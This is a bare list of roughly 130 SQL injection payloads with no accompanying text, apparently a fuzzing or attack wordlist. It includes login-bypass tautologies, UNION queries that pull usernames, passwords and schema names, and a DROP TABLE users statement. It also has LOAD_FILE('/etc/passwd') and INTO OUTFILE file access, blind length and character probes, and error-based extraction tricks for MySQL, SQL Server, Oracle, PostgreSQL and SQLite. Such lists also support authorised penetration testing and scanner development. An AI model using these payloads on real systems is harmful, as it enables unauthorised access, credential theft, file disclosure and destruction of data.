' OR '1'='1 --
" OR "1"="1 --
' OR 1=1 --
') OR ('1'='1 --
"') OR ('1'='1" --
' AND 1=CONVERT(int, 'X') --
" AND 1=CAST('X' AS INT) --
' AND EXISTS(SELECT * FROM nonexistent_table) --
" AND NOT EXISTS(SELECT * FROM users WHERE 1=0) --
1 OR 1=CAST('X' AS INT) --
' UNION SELECT 1,version() --
" UNION SELECT 1,@@version --
' UNION SELECT NULL,NULL --
' UNION SELECT username,password FROM users --
' UNION SELECT table_name FROM information_schema.tables --
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --
' UNION ALL SELECT NULL,NULL,NULL --
' UNION SELECT database(),user() --
' UNION SELECT 1,@@global.sql_mode --
' UNION SELECT @@hostname,user() --
' OR 'a'='a' AND 'b'='c' --
" OR "X'="Y --
' OR ''=' --
"; DROP TABLE users --
' SELECT FROM nonexistent_table --
" SELECT 1 FROM dual WHERE ""='' --
' ORDER BY 1000 --
' GROUP BY 999 --
' HAVING 1=0 --
" INTO OUTFILE '/tmp/dump.txt' --
' UNION SELECT 1,CAST((SELECT @@version) AS INT) --
' AND (SELECT COUNT(*) FROM users)=1 --
' UNION SELECT password FROM admin WHERE LENGTH(password)>10 --
" OR LENGTH(database()) > 10 --
' UNION SELECT 1,pg_table_size('users') --
' AND 1/(SELECT LENGTH(database()))=1 --
" AND 1=CONVERT('X',SIGNED INTEGER) --
' OR EXP(999999) > 1 --
'/ **/ UNION SELECT 1,2 --
" -- ' --`
' OR 'key'='key' --
" OR "select"="select" --
' OR 'table'='table' --
" OR "from"="from" --
' AND CHAR_LENGTH('test')=4 --
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
' OR ASCII('A')=65 --
" AND ORD('A')=65 --
' OR LENGTH('abc')=3 --
" AND ASCII(SUBSTRING('test',1,1))=116 --
' UNION SELECT 1 FROM dual WHERE 1='A' --
" UNION SELECT 'text' WHERE 'text'=NULL --
' UNION SELECT NULL WHERE LENGTH(NULL)>1 --
' OR 1/0=1 --
" AND 1/(SELECT CHAR(1))=1 --
' OR 1/CAST('0' AS INT)=1 --
' UNION SELECT 1,CONCAT('test',1234) --
" UNION SELECT CONCAT('a','b'),NULL --
' OR 1=CONCAT(NULL,NULL) --
' AND MOD(1,0)=0 --
' UNION SELECT table_schema FROM information_schema.schemata --
" UNION SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT 1,2 UNION SELECT 3,4 --
" UNION SELECT NULL,NULL WHERE 1=1 --
' UNION SELECT 'abc',NULL,NULL,NULL,NULL --
" UNION SELECT * FROM users WHERE '1'='1' --
' UNION SELECT COUNT(*) FROM admin WHERE 1=1 --
" UNION SELECT column_name FROM information_schema.columns WHERE table_name='admin' --
' UNION SELECT 1,NULL,table_name FROM information_schema.tables WHERE 1=1 --
' UNION SELECT USER(),DATABASE(),VERSION() --
' OR 1=1#
" OR '1'='1#
' OR ""=" --
" OR "%"="%" --
' /*'
" #"
' --`
"; SELECT * FROM users#
" UNION SELECT * FROM admin /* test */ --
" UNION SELECT * FROM (SELECT * FROM users) AS X --
' AND LENGTH(database()) > 0 --
' AND (SELECT LENGTH(USER()))=10 --
' AND (SELECT COUNT(*) FROM information_schema.tables) > 100 --
' UNION SELECT DISTINCT table_name FROM information_schema.tables --
' AND ASCII(SUBSTRING(DATABASE(),1,1))=77 --
" OR EXISTS(SELECT 'test') --
' AND 1=CAST((SELECT COUNT(*) FROM users) AS SIGNED) --
' OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='test')>10 --
' OR COUNT(*) > 1 --
' AND LENGTH(NULL)>1 --
' AND TRUE=FALSE --
' WHERE 'a' LIKE 'b%' --
' AND NOT EXISTS(SELECT * FROM dual WHERE 1=0) --
" OR NOT 'a'='b' --
' UNION SELECT REPEAT('a',1000) --
" UNION SELECT SPACE(100) --
" UNION SELECT CHAR(33) --
' OR RAND() > 0 --
' OR REGEXP_LIKE('a', 'b') --
" AND 1=1 LIMIT 1 OFFSET 0 --
' AND 1 = (SELECT RAISE(ABORT, 'Error triggered')) --  
' AND 1 = (SELECT load_extension('nonexistent_extension')) --  
' AND 1 = (SELECT abs(-9223372036854775808)) --  
' AND 1 = (SELECT CASE WHEN (1=1) THEN RAISE(ABORT, 'Error') ELSE 1 END) --  
' AND 1 = (SELECT sqlite_version()) --  
' AND 1 = UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM = 1)) --  
' AND 1 = DBMS_UTILITY.GET_PARAMETER_VALUE((SELECT username FROM all_users WHERE ROWNUM = 1)) --  
' AND 1 = CTXSYS.DRITHSX.SN(1, (SELECT banner FROM v$version WHERE ROWNUM = 1)) --  
' AND 1 = (SELECT TO_NUMBER((SELECT table_name FROM all_tables WHERE ROWNUM = 1))) --  
' AND 1 = (SELECT TO_NUMBER((SELECT column_name FROM all_tab_columns WHERE ROWNUM = 1))) --  
' AND 1 = CONVERT(INT, (SELECT @@version)) --  
' AND 1 = (SELECT COUNT(*) FROM sys.tables WHERE name = 'nonexistent_table') --  
' AND CAST((SELECT system_user) AS INT) = 1 --  
' AND 1 = (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 1 END) --  
' AND 1 = CONVERT(INT, (SELECT name FROM master..sysdatabases WHERE dbid = 1)) --  
' AND CAST((SELECT version()) AS INT) = 1337 --  
' AND 1337 = CAST((SELECT current_database()) AS NUMERIC) --  
' AND (SELECT 1 FROM generate_series(1,1000000)) = 1 --  
' AND 1 = (SELECT CASE WHEN (1=1) THEN CAST(1/0 AS INTEGER) ELSE 1 END) --  
' AND 1337 = CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS NUMERIC) --  
' AND EXTRACTVALUE(1337, CONCAT(0x3a, (SELECT DATABASE()))) --  
' AND UPDATEXML(1337, CONCAT(0x3a, (SELECT USER())), 1337) --  
' AND GTID_SUBSET(CONCAT(0x3a, (SELECT VERSION()), 0x3a), 1337) --  
' AND JSON_KEYS((SELECT CONVERT((SELECT TABLE_NAME FROM information_schema.tables LIMIT 1) USING utf8))) --  
' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x3a, (SELECT @@version), 0x3a, 'x')) x)) --  
